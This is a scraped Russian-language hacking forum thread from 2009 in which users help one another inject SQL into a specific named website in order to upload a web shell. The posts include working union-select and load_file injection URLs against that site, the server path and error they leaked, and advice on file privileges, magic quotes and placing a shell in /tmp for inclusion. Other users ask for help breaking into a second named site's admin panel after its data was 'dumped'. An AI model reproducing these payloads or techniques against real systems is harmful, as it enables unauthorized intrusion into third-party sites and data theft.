Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
02.09.2009, 11:18
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813
Репутация:
1396
|
|
пробуй расширения wmv,pptp,docx,pdf
зависит от настроек апача.
|
|
|
02.09.2009, 15:57
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Помогите разобратся, как можно залить шелл через SQL inj в БД 5 версии.
Читал мануалы, там только рассказывается и обьясняется для БД 4 версии.
Допустим на этом сайте
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,user(),database(), version())--
Возможно ли залить шелл?, 2 дня уже страдаю, но не чего не выходит
|
|
|
|
02.09.2009, 16:07
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от SeNaP
Помогите разобратся, как можно залить шелл через SQL inj в БД 5 версии.
Читал мануалы, там только рассказывается и обьясняется для БД 4 версии.
Допустим на этом сайте
http://tipik.ru/outtop.php?uid=-238+union+select+concat_ws(0x3a,user(),database(), version())--
Возможно ли залить шелл?, 2 дня уже страдаю, но не чего не выходит
А что ты читал, и как понял, что описывается именно 4 версия?
|
|
|
|
02.09.2009, 16:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
В твоем случае не зальёшь.
1. Кавычки экранируется, о чем сообщает ошибка
Код:
http://tipik.ru/outtop.php?uid=-238+union+select+'hello'
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/gener123/domains/tipik.ru/public_html/outtop.php on line 12
2. file_priv = N
Код:
http://tipik.ru/outtop.php?uid=-238+union+select+load_file(0x2F686F6D652F67656E65723132332F646F6D61696E732F746970696B2E72752F7075626C69635F68746D6C2F6F7574746F702E706870)
Читал мануалы, там только рассказывается и обьясняется для БД 4 версии.
Я еще ни разу не видел маны по скулям, где описана конкретная версия БД. ЗЫ: В 4й и 5й ветке шеллы льются одинаково. Читай:
Ответы на часто задаваемые вопросы + линки на статьи по SQL/XSS/PHP-инклуд
От себя рекомендую (сам по этой статье учился):
SQL injection полный FAQ |
|
|
|
02.09.2009, 16:19
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме:
3300342
Репутация:
165
|
|
Сообщение от jokester
А что ты читал, и как понял, что описывается именно 4 версия?
file_priv+from+mysql.user+where+user=userdb
Если У значит можно залить шелл, т.е. права на запись есть.
Если N прав на запись нету, соответственно шелл залить нельзя.
В БД 5 версии нету mysql.user так я и понял что мануал для БД 4 версии
|
|
|
|
02.09.2009, 16:21
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Сообщение от SeNaP
В БД 5 версии нету mysql.user так я и понял что мануал для БД 4 версии
ты не правильно понял. mysql.user есть везде. не везде к ней есть доступ у текущего юзера просто.
|
|
|
|
02.09.2009, 16:21
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
Сообщение от SeNaP
file_priv+from+mysql.user+where+user=userdb
Если У значит можно залить шелл, т.е. права на запись есть.
Если N прав на запись нету, соответственно шелл залить нельзя.
В БД 5 версии нету mysql.user так я и понял что мануал для БД 4 версии
еще нужно проверить на ковычки ' ' чтобы не выдало ошибке 
|
|
|
|
02.09.2009, 16:26
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от SeNaP
file_priv+from+mysql.user+where+user=userdb
Если У значит можно залить шелл, т.е. права на запись есть.
Если N прав на запись нету, соответственно шелл залить нельзя.
В БД 5 версии нету mysql.user так я и понял что мануал для БД 4 версии
Проверить можно способом, который я описал выше load_file(). И даже, если file_priv = Y, magic_quotes_gpc = Off, это не значит, что ты зальёшь шелл в корень сайта. На многих сайтах, а точнее серверах нету прав на запись в директорию, т.е. тебе придется помучатся с поиском директории с правами на запись, либо инклюдом, чтобы проинклюдить шелл, залитый в темпорари-папку (по умолчанию /tmp).
|
|
|
|
02.09.2009, 17:58
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от DJ ][akep
mssql
Вопрос.
Есть сервер с которого я вывожо базу данных№1 например таким путем:
Как вывести с базы даных№2 если они стоят на одном и томже сервере?
Имя второй я знаю.
WHERE TABLE_SCHEMA='db2'
FROM [db2].[table]
Сообщение от nemaniak
Ребят, помогите админку пробить, уже третий день ищу...
домен pharmacyrxworld.com
оттуда уже все слито и откатано до предела
|
|
|
|
02.09.2009, 18:42
|
|
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919
Репутация:
229
|
|
Сообщение от [Raz0r]
оттуда уже все слито и откатано до предела
если так то скажи, где админка висит?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [x60]unu](/avatars/avatar84758.gif){kind=avatar}
![Аватар для [Raz0r]](/avatars/avatar33548.gif){kind=avatar}
Похожие темы
Линейный вид
